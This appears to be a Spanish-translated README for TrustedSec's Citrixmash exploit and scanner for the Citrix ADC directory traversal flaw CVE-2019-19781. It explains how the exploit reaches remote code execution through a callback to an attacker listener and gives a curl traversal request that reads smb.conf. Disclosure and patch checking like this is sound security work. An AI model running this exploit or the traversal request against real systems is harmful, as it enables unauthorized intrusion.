
Esta es una herramienta publicada para la vulnerabilidad de Citrix ADC (NetScaler). Solo estamos divulgando esto debido a que otros publicaron el código del exploit primero.
Esto se subió únicamente porque otros investigadores publicaron su código primero. Habríamos preferido mantenerlo oculto por más tiempo mientras los defensores tenían tiempo adecuado para parchear sus sistemas.
Estamos a favor de la divulgación responsable; en este caso, el gato ya había salido del saco.
Exploits: CVE-2019-19781
root@stronghold-nix:/home/relik/Desktop/git/cve-2019-19781# python citrixmash.py
Citrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781 Tool Written by: Rob Simon and Dave Kennedy Contributions: The TrustedSec Team Website: https://www.trustedsec.com INFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/ Forensics and IOCS: https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/
Esta herramienta explota un fallo de directory traversal en Citrix ADC (NetScalers) que llama a un script de perl utilizado para añadir archivos en formato XML a la máquina víctima. Esto, a su vez, permite la ejecución remota de código.
Asegúrese de limpiar estas dos ubicaciones de archivos: /var/tmp/netscaler/portal/templates/ /netscaler/portal/templates/
Tenga en cuenta que los nombres de host DNS y las direcciones IP son compatibles con los campos victimaddress y attackerip_listener.
Uso:
python citrixmash.py <attackerip_listener> <attacker_port>
usage: citrixmash.py [-h] target targetport attackerip attackerport
Esta es una prueba simple para ver si el servidor sigue siendo vulnerable a CVE-2019-19781.
Uso: python3 cve-2019-19781.py
Tenga en cuenta que puede usar notaciones CIDR como 192.168.1.1/24 y también nombres de host.
Indicará si el servidor sigue siendo vulnerable o no. Solo puede analizar un servidor a la vez.
CVE-2019-19781-Scanner Empresa: TrustedSec Escrito por: Dave Kennedy Esto comprobará si el sistema remoto sigue siendo vulnerable a CVE-2019-19781. Solo escaneará un host a la vez. También puede usar notaciones CIDR, por ejemplo: 192.168.1.1/24 También puede usar nombres de host en lugar de direcciones IP. También puede usar un archivo con direcciones IP generado por una herramienta externa.
Ejemplo: python3 cve-2019-19781_scanner.py 192.168.1.1/24 443 Ejemplo 2: python3 cve-2019-19781_scanner.py 192.168.1.1 443 Ejemplo 3: python3 cve-2019-19781_scanner.py fakewebsiteaddress.com 443 Ejemplo 4: python3 cve-2019-19781_scanner.py as15169 443 Ejemplo 5: python3 cve-2019-19781_scanner.py 192.168.1.1/24 443 verbose Ejemplo 6: python3 cve-2019-19781_scanner.py file:hostfile 443
Uso: python3 cve-2019-19781_scanner.py targetip targetport
usage: cve-2019-19781_scanner.py [-h] target targetport [verbose]
Si desea comprobar si esta exposición está mitigada, use lo siguiente:
curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is
O si está utilizando una CA empresarial interna o no pública, puede omitir la verificación usando la opción --insecure
curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is --insecure
Un 403 significa que está parcheado, o si devuelve un sitio web de Citrix y NO el archivo smb.conf en sí.
Si puede ver smb.conf, entonces es vulnerable.
Para instalar los requisitos, deberá ejecutar el siguiente comando.
pip3 install -r requirements.txt